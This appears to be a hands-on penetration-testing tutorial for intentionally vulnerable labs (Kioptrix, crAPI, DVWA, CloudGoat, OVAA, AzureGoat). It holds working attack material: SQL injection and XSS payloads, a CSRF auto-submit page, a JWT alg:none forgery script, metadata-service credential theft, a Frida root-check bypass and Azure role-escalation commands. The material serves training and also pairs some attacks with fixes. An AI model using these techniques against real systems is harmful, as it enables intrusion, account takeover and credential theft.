Top 10 Vulnerable Labs Every Aspiring Penetration Tester Must Exploit (Hands-On Guide) + Video

Introduction:

The gap between reading about cybersecurity vulnerabilities and actually exploiting them in a controlled environment is where real skill development happens. Hands-on practice with deliberately broken systems – from web applications and APIs to cloud infrastructure and mobile apps – transforms theoretical knowledge into actionable penetration testing expertise.

Learning Objectives:

  • Deploy and enumerate classic vulnerable virtual machines (Kioptrix, Metasploitable) to practice privilege escalation and exploitation
  • Identify and exploit modern API security flaws (crAPI, VAmPI) including broken object level authorization and excessive data exposure
  • Simulate cloud misconfiguration attacks across AWS, Azure, and GCP using CloudGoat, AzureGoat, and GCPGoat

You Should Know:

  1. Deploying and Attacking Kioptrix – Classic Linux Privilege Escalation

Kioptrix is an intentionally vulnerable Linux VM that teaches enumeration, service exploitation, and kernel privilege escalation. It mimics real-world legacy systems with outdated software.

Step‑by‑step guide (Linux attack machine, e.g., Kali):

 1. Identify target IP (use netdiscover or arp-scan)
sudo netdiscover -r 192.168.1.0/24

 2. Scan all TCP ports with version detection, default scripts and OS fingerprinting
nmap -sV -sC -O -p- 192.168.1.XXX

 3. Kioptrix Level 1 typically exposes Apache 1.3.x with mod_ssl 2.8.x (ports 80/443) and Samba 2.2.x (port 139). Look both up in searchsploit; the mod_ssl hit is the "OpenFuck" remote buffer overflow in OpenSSL's SSLv2 handshake
searchsploit mod_ssl
searchsploit samba 2.2

 4. Exploit. OpenFuck is a standalone C exploit from searchsploit (mirror it with searchsploit -m and build it as the comment at the top of the file describes). The Samba service has a ready Metasploit module, which is the quicker path to a root shell:
msfconsole
msf6 > use exploit/linux/samba/trans2open
msf6 > set RHOSTS 192.168.1.XXX
msf6 > run

 5. After getting an initial shell, enumerate the OS, users and listening services
whoami; id; uname -a; cat /etc/passwd

 6. Privilege escalation via a local kernel exploit. Pick one that matches the exact kernel version from uname -a: Kioptrix Level 1 runs a 2.4-series kernel, so Dirty COW (introduced in 2.6.22 and fixed in the 4.8 line) does not apply, while the old ptrace/kmod race for 2.4.x does. Transfer the exploit to the target (wget from the target if it has internet access, otherwise host it from the attack box with python3 -m http.server and fetch it), upgrade to a proper TTY, then compile it on the target if gcc is present and run it. Old targets only ship a python 1.x/2.x interpreter, so use whichever python binary exists there for the TTY upgrade:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Windows alternative: Kioptrix is a Linux target with no Windows variant. You can run the same nmap, searchsploit and Metasploit steps from a Windows attack box (and use PuTTY or PowerShell's ssh client if the target offers SSH), but to practice Windows privilege escalation use Metasploitable3 instead.
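The enumeration step above ends with a list of product/version strings that you then feed to searchsploit by hand. The following added example (not part of the original guide and not a tool from the Kioptrix project) parses nmap's XML output (`nmap -oX`) and turns every open, fingerprinted service into a searchsploit query, including modules nmap only reports in the extrainfo field such as mod_ssl and OpenSSL. The XML inside it is a constructed sample shaped like a scan of a Kioptrix Level 1 style host, not a real scan result.

```python
"""Turn nmap -oX output into searchsploit queries (added example, constructed sample scan)."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of `nmap -sV -oX - <host>` output; the host and versions are illustrative.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.XXX">
  <host>
    <address addr="192.168.1.XXX" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="2.9p2"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="1.3.20"
                 extrainfo="(Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="2.2.1a"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https" product="Apache httpd" version="1.3.20"/>
      </port>
      <port protocol="tcp" portid="111">
        <state state="closed"/>
        <service name="rpcbind"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Matches "module/version" tokens nmap tucks into extrainfo, e.g. mod_ssl/2.8.4 or OpenSSL/0.9.6b.
EXTRA_MODULE = re.compile(r"([A-Za-z_]+)/([0-9][\w.]*)")


def open_services(nmap_xml: str) -> List[Dict[str, str]]:
    """Return one record per open port that nmap could fingerprint.

    Closed/filtered ports and services without a product name are skipped,
    because searchsploit has nothing to match on for those.
    """
    root = ET.fromstring(nmap_xml)
    found = []
    for port in root.iter("port"):
        state = port.find("state")
        service = port.find("service")
        if state is None or state.get("state") != "open" or service is None:
            continue
        product = service.get("product")
        if not product:
            continue
        found.append({
            "port": int(port.get("portid")),
            "product": product,
            "version": service.get("version", ""),
            "extrainfo": service.get("extrainfo", ""),
        })
    return found


def searchsploit_queries(services: List[Dict[str, str]]) -> List[str]:
    """Build de-duplicated searchsploit command lines, one per product/version.

    The same Apache on 80 and 443 yields a single query; extrainfo modules get their own.
    """
    queries: List[str] = []
    for svc in services:
        candidates = [(svc["product"], svc["version"])]
        candidates += EXTRA_MODULE.findall(svc["extrainfo"])
        for name, version in candidates:
            query = f"searchsploit {name} {version}".strip()
            if query not in queries:
                queries.append(query)
    return queries


if __name__ == "__main__":
    for line in searchsploit_queries(open_services(SAMPLE_NMAP_XML)):
        print(line)
```

Run it against a real scan with `nmap -sV -p- -oX scan.xml <target>` and read the file into `open_services`; the queries it prints are a starting point, and you still need to confirm each candidate exploit against the exact build the banner reports.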

  2. API Security Lab: crAPI – Attacking a Modern Vehicle API

crAPI (Completely Ridiculous API) exposes over 30 API vulnerabilities including BOLA, BFLA, mass assignment, and JWT misconfigurations. It’s essential for understanding OWASP API Top 10.

Step‑by‑step guide:

 Deploy crAPI (Docker with the Compose plugin required). The compose file lives under deploy/docker in the repository
git clone https://github.com/OWASP/crAPI.git
cd crAPI/deploy/docker
docker compose pull
docker compose up -d
 Web UI at http://localhost:8888; the MailHog inbox at http://localhost:8025 receives the sign-up and password-reset mails you will need

 1. Enumerate API endpoints using Burp Suite or Postman
Browse the application with the proxy on and intercept traffic; in crAPI the services sit under /identity/api/, /workshop/api/ and /community/api/
 2. Test for BOLA (Broken Object Level Authorization): replace the object ID in a request with one that belongs to another user
Original: GET /api/vehicles/1234/location
Try: GET /api/vehicles/1235/location (another user's vehicle)
 The paths above are illustrative. crAPI identifies vehicles by UUID, so the second ID cannot be guessed and has to be harvested, for example from the author details leaked in community posts
 3. JWT alg:none with curl
Capture a JWT from login, decode the header, change it to {"alg":"none"}, re-encode it, and send the token with an empty signature (hence the trailing dot). The token below is the jwt.io sample payload re-encoded with alg none; replace its payload with the claims of your captured crAPI token and send it to an authenticated endpoint such as the user dashboard
curl -X GET "http://localhost:8888/identity/api/v2/user/dashboard" -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
 4. Mass assignment: add fields the client was never meant to set. The request needs a valid session token, and the endpoint and is_admin field below are illustrative; look for the same pattern in crAPI's workshop order endpoints
curl -X POST "http://localhost:8888/api/vehicles" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -d '{"make":"Honda","model":"Civic","is_admin":true}'
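
The alg:none step above hands you a token but does not show why a server accepts it. The added example below (not crAPI code; the HS256 secret and the claims are constructed) forges an alg:none token from a captured one and puts a verifier that trusts the token's own `alg` header next to one that pins the algorithm server-side, which is the fix. The same helpers cover the inverse check: a genuinely signed token still passes the pinned verifier.

```python
"""JWT alg:none forgery and the pinned-algorithm fix (added example, constructed secret/claims)."""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-server-secret"  # stands in for the server's HS256 signing key


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Restore the padding JWT strips before decoding; an empty segment decodes to b''."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a legitimately signed token, the way the login endpoint would."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def forge_alg_none(token: str, **new_claims) -> str:
    """Rewrite the claims of a captured token, set alg to none and drop the signature.

    The result ends with '.' because the third (signature) segment is empty.
    """
    _header, payload, _sig = token.split(".")
    claims = json.loads(b64url_decode(payload))
    claims.update(new_claims)
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{payload}."


def verify_trusting_header(token: str, key: bytes) -> dict:
    """Vulnerable verifier: dispatches on whatever alg the token names, so none means no check."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_pinned(token: str, key: bytes) -> dict:
    """Hardened verifier: the server decides the algorithm; any other alg is rejected outright."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    real = sign_hs256({"sub": "victim@example.com", "role": "user"}, SECRET)
    forged = forge_alg_none(real, role="admin")
    print("forged token:", forged)
    print("trusting verifier says:", verify_trusting_header(forged, SECRET))
    try:
        verify_pinned(forged, SECRET)
    except ValueError as err:
        print("pinned verifier rejects it:", err)
```

Paste the printed token into the curl command from step 3; if the endpoint answers with the victim's data, the server is dispatching on the token's `alg` exactly like `verify_trusting_header`.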
  3. Web App Hacking on DVWA – SQLi, XSS, and CSRF Walkthrough

Damn Vulnerable Web Application (DVWA) offers configurable security levels. Start with low security to learn mechanics, then escalate to medium/high to practice bypasses.

Step‑by‑step guide (Linux):

 Install a LAMP stack and DVWA (Debian/Ubuntu/Kali package names: the mysqli driver ships in php-mysql, and DVWA also needs php-gd)
sudo apt update && sudo apt install apache2 mariadb-server php php-mysql php-gd
sudo systemctl start apache2 mariadb
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWA
 Copy config/config.inc.php.dist to config/config.inc.php and set the database credentials, then create that user in MariaDB (the shipped default is dvwa / p@ssw0rd)
 Visit http://localhost/DVWA/setup.php, click "Create / Reset Database", log in as admin / password, and set the level to Low on the DVWA Security page

SQL Injection (Low security) – the page runs SELECT first_name, last_name FROM users WHERE user_id = '<input>'. In the User ID field, enter:
1' OR '1'='1
 This closes the quote and makes the WHERE clause always true, so every user is listed. To pull credentials, UNION in two columns from the users table and comment out the trailing quote with a MySQL comment:
1' UNION SELECT user, password FROM users#
 Use sqlmap for automated exploitation (copy PHPSESSID from your browser; the security cookie must say low):
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=xxx" --dbs

XSS (Stored) – The Name field is capped at 10 characters by a client-side maxlength attribute, so either delete that attribute in the browser's developer tools or put the payload in the Message field:
<script>alert(document.cookie)</script>

CSRF – At Low security the password-change form submits its parameters with GET, so craft an HTML page that auto-submits a GET form. A logged-in victim who opens it gets the password changed; a top-level navigation like this still carries SameSite=Lax session cookies, which is why the GET form works where a cross-site POST would not:
<html><body onload="document.forms[0].submit()">

<form action="http://localhost/DVWA/vulnerabilities/csrf/" method="GET">
<input name="password_new" value="hacked">
<input name="password_conf" value="hacked">
<input name="Change" value="Change">
</form>

</body></html>
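
To see the SQL injection mechanics without the browser in the way, the added example below (not DVWA's code) rebuilds the Low-level query in an in-memory SQLite database and runs the two payloads from above against the string-concatenated version and against a parameterised version. The users table and rows are constructed to resemble DVWA's (the hashes are plain MD5 of "password" and "abc123"); note that SQLite comments with `--` rather than MySQL's `#`, so the UNION payload is written with `--` here.

```python
"""DVWA-style SQL injection: concatenated query beside its parameterised fix (added example)."""
import sqlite3
from typing import List, Tuple

Row = Tuple[str, str]


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for DVWA's users table (two rows, MD5 password hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                            user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'e99a18c4428cb38d5f260853678922e3');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """What DVWA Low does: the input is spliced into the SQL text, so quotes change the grammar."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """The fix: a bound parameter is data only; a quote in it is just a character to compare."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# The two payloads from the walkthrough (UNION one uses SQLite's -- comment instead of MySQL's #).
PAYLOAD_TAUTOLOGY = "1' OR '1'='1"
PAYLOAD_UNION = "1' UNION SELECT user, password FROM users--"


if __name__ == "__main__":
    db = build_db()
    print("normal:     ", lookup_vulnerable(db, "1"))
    print("tautology:  ", lookup_vulnerable(db, PAYLOAD_TAUTOLOGY))
    print("union dump: ", lookup_vulnerable(db, PAYLOAD_UNION))
    print("safe query: ", lookup_safe(db, PAYLOAD_TAUTOLOGY))
```

The UNION result shows up in the page's first_name/last_name columns, which is why the payload must select exactly two columns: the number of columns in the injected SELECT has to match the original query.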
  4. CloudGoat – AWS Misconfiguration Exploitation (S3, IAM, EC2)

CloudGoat is Rhino Security Labs’ “vulnerable by design” AWS environment. It teaches real cloud attack paths like public S3 buckets, overprivileged IAM roles, and EC2 metadata abuse.

Step‑by‑step guide:

 Prerequisites: Python 3, pip, Terraform, the AWS CLI, and an AWS account with an IAM user whose keys are configured as a CLI profile (deployed scenarios cost money while they run, so destroy them when you are done)
 Clone and configure (CloudGoat is installed from the repo, not from PyPI)
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
pip3 install -r ./core/python/requirements.txt
./cloudgoat.py config profile
./cloudgoat.py config whitelist --auto

Deploy a scenario (e.g., 'ec2_ssrf')
./cloudgoat.py create ec2_ssrf
 The start file written into the scenario directory holds the starting credentials: an access key for a low-privileged IAM user

Attack simulation – assume the compromised access key
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...

 1. Enumerate S3 buckets
aws s3 ls
 2. Try to download bucket contents (if the key, or the bucket policy, allows it)
aws s3 cp s3://vulnerable-bucket/secret.txt ./
 3. List EC2 instances, then pull each instance's user data (describe-instances does not include it)
aws ec2 describe-instances --region us-east-1
aws ec2 describe-instance-attribute --instance-id i-xxxxxxxx --attribute userData --region us-east-1
 The userData value is base64; decode it and look for hardcoded keys, passwords or bucket names
 4. Exploit SSRF through an application running on the instance to reach the metadata service
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
 Request the role name that comes back to get its temporary AccessKeyId, SecretAccessKey and Token, then export all three (including AWS_SESSION_TOKEN) to act as the instance role. If the instance enforces IMDSv2, a plain GET returns 401 because a session token obtained with a PUT request must be sent first, which an SSRF that only controls the URL usually cannot do

Mitigation: Apply least-privilege IAM policies, require IMDSv2 on instances (HttpTokens=required) so a plain GET to the metadata endpoint fails, and destroy the scenario with cloudgoat's destroy command when finished.

Windows/PowerShell alternative: install the AWS Tools for PowerShell (Install-Module -Name AWSPowerShell), set the compromised key with Set-AWSCredential, then use Get-S3Bucket and Get-EC2Instance.
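
Step 3 tells you to decode user data and look for secrets by eye. The added example below (not CloudGoat's code) does that over the JSON that `aws ec2 describe-instance-attribute --attribute userData` returns: it decodes the base64 body and runs a few credential patterns over it. The JSON is constructed; the access key in it is the AKIAIOSFODNN7EXAMPLE value from AWS's own documentation and is not a working key.

```python
"""Decode EC2 user data and scan it for hardcoded credentials (added example, constructed input)."""
import base64
import json
import re
from typing import List, Tuple

# Constructed to look like `aws ec2 describe-instance-attribute --attribute userData` output.
# The key pair is the non-functional example pair from the AWS docs.
SAMPLE_ATTRIBUTE_JSON = json.dumps({
    "InstanceId": "i-0123456789abcdef0",
    "UserData": {"Value": base64.b64encode(b"""#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws s3 cp s3://cg-secret-bucket/app.tgz /opt/
echo "db_password=Sup3rS3cret!" >> /etc/app.conf
""").decode()},
})

# (label, pattern whose group 1 is the secret) - kept deliberately simple; extend as needed.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")),
    ("aws_secret_access_key",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*[\"']?([A-Za-z0-9/+=]{40})")),
    ("password", re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*[\"']?([^\s\"']+)")),
]


def decode_user_data(attribute_json: str) -> str:
    """Return the decoded user-data script, or '' when the instance has none."""
    value = json.loads(attribute_json).get("UserData", {}).get("Value")
    if not value:
        return ""
    return base64.b64decode(value).decode("utf-8", errors="replace")


def find_secrets(text: str) -> List[Tuple[str, str]]:
    """Run every pattern over the script and return (kind, value) hits in pattern order."""
    hits = []
    for kind, pattern in PATTERNS:
        for match in pattern.finditer(text):
            hits.append((kind, match.group(1)))
    return hits


if __name__ == "__main__":
    script = decode_user_data(SAMPLE_ATTRIBUTE_JSON)
    for kind, value in find_secrets(script):
        print(f"{kind:24s} {value}")
```

In the lab, pipe the real CLI output in with `aws ec2 describe-instance-attribute ... > ud.json` and pass the file contents to `decode_user_data`; an access key found this way is the next credential to export and enumerate with.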

  5. Android Goat – Mobile Application Security Testing

AndroGoat, DIVA and OVAA (Oversecured Vulnerable Android App, the one installed below) are deliberately vulnerable Android apps. They teach static and dynamic analysis, insecure data storage and logging, root detection bypass, and inter-component communication attacks such as abusing exported activities and content providers.

Step‑by‑step guide:

 Set up an Android emulator (Android Studio AVD) or a rooted physical device, then confirm adb sees it
adb devices

Install the OVAA APK (release asset from the repository's releases page)
wget https://github.com/oversecured/ovaa/releases/download/v1.0.0/ovaa.apk
adb install ovaa.apk

 1. Static analysis with jadx (decompiler); grep needs -E for | to mean alternation
jadx ovaa.apk -d output_source
grep -rEi "password|secret|api_key" output_source/
 Also read output_source/resources/AndroidManifest.xml for the package name and for exported activities, receivers and providers
 2. Insecure logging – watch logcat for sensitive data the app writes while you use it
adb logcat | grep -Ei "password|token|credit"
 3. Bypass root detection with Frida (dynamic instrumentation; frida-server must be running on the device)
frida-ps -U   # list processes on the USB-connected device
frida -U oversecured.ovaa -l bypass_root.js   # attach to the running app (confirm the package name with pm list packages)

Example Frida script bypass_root.js (the class and method names are placeholders; take the real ones from the jadx output):
Java.perform(function () {
  // Placeholder class: replace with the root-check class found in the decompiled source
  var RootDetection = Java.use("com.oversecured.ovaa.utils.RootDetection");
  RootDetection.isDeviceRooted.implementation = function () {
    console.log("[*] isDeviceRooted() hooked, returning false");
    return false;
  };
});
 4. Exploit an exported, unprotected content provider – query it from a shell on the device; the authority and projection below are placeholders to be replaced with values from the target's manifest
adb shell content query --uri content://com.example.provider/files --projection _data
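
Steps 3 and 4 both depend on knowing which components the app exposes. The added example below (not OVAA's or AndroGoat's code) reads a decoded AndroidManifest.xml such as the one jadx writes, applies Android's exported rule (an explicit android:exported wins; otherwise an intent-filter implies exported for activities, services and receivers, while providers default to not exported), and lists every exported component that is not gated by an android:permission, turning exported providers into ready `content query` commands. The manifest and package name are constructed for the example.

```python
"""Find exported, permission-less components in an AndroidManifest.xml (added example)."""
import xml.etree.ElementTree as ET
from typing import List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed manifest (not OVAA's); the package and component names are made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.vulnapp">
  <application android:label="VulnApp">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="vulnapp"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="false"/>
    <provider android:name=".FileProvider" android:authorities="com.example.vulnapp.files"
              android:exported="true" android:grantUriPermissions="true"/>
    <provider android:name=".SafeProvider" android:authorities="com.example.vulnapp.safe"
              android:exported="true" android:permission="com.example.vulnapp.READ"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
  </application>
</manifest>
"""


def attr(name: str) -> str:
    """Namespaced attribute key for android:<name> as ElementTree stores it."""
    return f"{{{ANDROID_NS}}}{name}"


def is_exported(elem: ET.Element) -> bool:
    """Android's rule: explicit android:exported wins; else an intent-filter implies exported,
    except for providers, which default to false on API 17 and later."""
    explicit = elem.get(attr("exported"))
    if explicit is not None:
        return explicit == "true"
    if elem.tag == "provider":
        return False
    return elem.find("intent-filter") is not None


def unprotected_exports(manifest_xml: str) -> List[Tuple[str, str, str]]:
    """Return (tag, fully-qualified class, authorities) for exported components without a permission."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for elem in root.iter():
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        if elem.get(attr("permission")):
            continue  # gated by a permission; still worth a look, but not open to any app
        name = elem.get(attr("name"), "")
        if name.startswith("."):
            name = package + name
        findings.append((elem.tag, name, elem.get(attr("authorities"), "")))
    return findings


def content_query_commands(findings: List[Tuple[str, str, str]]) -> List[str]:
    """Turn each exported provider into the adb command from step 4 (first authority only)."""
    return [f"adb shell content query --uri content://{auth.split(';')[0]}"
            for tag, _name, auth in findings if tag == "provider" and auth]


if __name__ == "__main__":
    found = unprotected_exports(SAMPLE_MANIFEST)
    for tag, name, auth in found:
        print(f"{tag:9s} {name} {auth}")
    print("\n".join(content_query_commands(found)))
```

Point it at `output_source/resources/AndroidManifest.xml` from the jadx run; the exported activities it lists are the ones you can launch with `adb shell am start`, and an exported provider with grantUriPermissions is the usual route to the arbitrary file read in step 4.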
  6. AzureGoat – Attacking Storage Accounts, Key Vaults, and Logic Apps

AzureGoat simulates misconfigurations such as publicly accessible blob storage, overly permissive RBAC, and managed identity abuse. Practice using Az PowerShell or Azure CLI.

Step‑by‑step guide (Linux or Windows):

 Install Azure CLI
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
az login --use-device-code

Deploy AzureGoat by following the repository README (each module is deployed with Terraform, or through the GitHub Actions workflow the repo provides); the deployment output lists the storage account and web app endpoints
git clone https://github.com/ine-labs/AzureGoat.git
cd AzureGoat

Attack: Enumerate storage containers with a leaked connection string
 Find the storage endpoint in the deployment output, or the connection string in leaked app settings or source code
az storage container list --connection-string "..."

Check whether a container allows anonymous access (public-access "blob" permits anonymous reads of known blob names; "container" also permits listing)
az storage container show-permission --name public-container --account-name vulnerablestorage

Download blobs without authentication (if public)
wget https://vulnerablestorage.blob.core.windows.net/public-container/secret.txt

Attack: Privilege escalation via an over-assigned RBAC role
 List the role assignments of the low-privilege identity you control
az role assignment list --assignee <user-principal-name-or-object-id>
 If one of its roles grants Microsoft.Authorization/roleAssignments/write at some scope (Owner and User Access Administrator do; Contributor explicitly does not), assign yourself a higher role at that scope
az role assignment create --assignee <user-principal-name-or-object-id> --role "Contributor" --scope /subscriptions/<subscription-id>

Mitigation: Disable public blob access at the storage account level (allowBlobPublicAccess = false), enforce RBAC least privilege so that only Owner and User Access Administrator can write role assignments, and tear the lab down with Terraform when finished.
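
Whether the escalation step above works depends on how Azure evaluates a role: an action is permitted when it matches one of the role's Actions and none of its NotActions, with `*` as a wildcard and case-insensitive matching. The added example below (not AzureGoat's code) reimplements that rule and checks a set of role assignments for any that can write role assignments. The role definitions are constructed to resemble the built-in Owner, Contributor and Reader plus one over-broad custom role, and the assignments are made up; DataActions are left out because they never cover management-plane writes like this one.

```python
"""Azure RBAC effective-permission check for the roleAssignments/write escalation (added example)."""
import fnmatch
from typing import Dict, List, Tuple

ESCALATION_ACTION = "Microsoft.Authorization/roleAssignments/write"

# Constructed role definitions shaped like `az role definition list` output, reduced to
# the two lists that matter. Contributor's NotActions mirror the built-in role's exclusion
# of Microsoft.Authorization writes; "Custom Helpdesk" is the over-broad custom role.
ROLE_DEFINITIONS: Dict[str, Dict[str, List[str]]] = {
    "Owner": {"actions": ["*"], "notActions": []},
    "Contributor": {
        "actions": ["*"],
        "notActions": [
            "Microsoft.Authorization/*/Delete",
            "Microsoft.Authorization/*/Write",
            "Microsoft.Authorization/elevateAccess/Action",
        ],
    },
    "Reader": {"actions": ["*/read"], "notActions": []},
    "Custom Helpdesk": {
        "actions": ["Microsoft.Compute/virtualMachines/read",
                    "Microsoft.Authorization/roleAssignments/write"],
        "notActions": [],
    },
}

# Constructed assignments (principal, role, scope), like `az role assignment list` reduced.
SAMPLE_ASSIGNMENTS = [
    {"principal": "alice@contoso.example", "role": "Contributor", "scope": "/subscriptions/sub-1"},
    {"principal": "bob@contoso.example", "role": "Reader", "scope": "/subscriptions/sub-1"},
    {"principal": "carol@contoso.example", "role": "Custom Helpdesk",
     "scope": "/subscriptions/sub-1/resourceGroups/rg-lab"},
    {"principal": "dave@contoso.example", "role": "Owner",
     "scope": "/subscriptions/sub-1/resourceGroups/rg-lab"},
]


def matches(pattern: str, action: str) -> bool:
    """Azure action matching: case-insensitive, '*' spans any number of path segments."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def role_allows(role: Dict[str, List[str]], action: str) -> bool:
    """Effective permission = matched by some Action and not matched by any NotAction."""
    allowed = any(matches(p, action) for p in role["actions"])
    denied = any(matches(p, action) for p in role.get("notActions", []))
    return allowed and not denied


def escalation_paths(assignments, definitions=ROLE_DEFINITIONS,
                     action=ESCALATION_ACTION) -> List[Tuple[str, str, str]]:
    """Return (principal, role, scope) for every assignment that permits `action`.

    The scope is part of the answer: roleAssignments/write at a resource group only lets
    the principal hand out roles inside that group, which is still an escalation there.
    """
    return [(a["principal"], a["role"], a["scope"])
            for a in assignments if role_allows(definitions[a["role"]], action)]


if __name__ == "__main__":
    for principal, role, scope in escalation_paths(SAMPLE_ASSIGNMENTS):
        print(f"{principal} can write role assignments via {role!r} at {scope}")
```

To run it against the lab, dump `az role assignment list --all -o json` and `az role definition list -o json`, map them onto the two structures above (roleDefinitionName, principalName, scope; permissions[0].actions / notActions), and any principal the function reports is a candidate for the `az role assignment create` step.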

What Undercode Say:

  • Labs bridge theory and practice – You cannot learn penetration testing solely from books or videos. Each listed lab exposes real attacker thought processes: enumeration, exploitation, lateral movement, and privilege escalation.
  • Progressive skill building – Start with Kioptrix (Linux privesc), then web (DVWA), APIs (crAPI), mobile, and finally cloud (CloudGoat trio). This sequence ensures foundational skills before tackling distributed architectures.
  • Automate but understand – Using sqlmap, Metasploit, or Frida is efficient, but manual attempts (e.g., crafting SQLi payloads by hand) build deeper intuition. Always practice both ways.

Prediction:

As cloud-native and API-driven architectures dominate, traditional network pentesting labs will become less sufficient. Expect a surge in integrated labs that combine AWS/Azure misconfigurations with OWASP API Top 10 and supply chain vulnerabilities (e.g., vulnerable CI/CD pipelines). AI‑assisted pentesting tools will emerge, but hands-on lab proficiency will remain the gold standard for hiring – certifications alone won’t prove skill. The labs listed here are just the beginning; future practitioners must also practice Kubernetes attack paths (e.g., Katacoda scenarios) and GraphQL API abuse. Start today, because attackers already are.

Reported By: Michael Eru – Hackers Feeds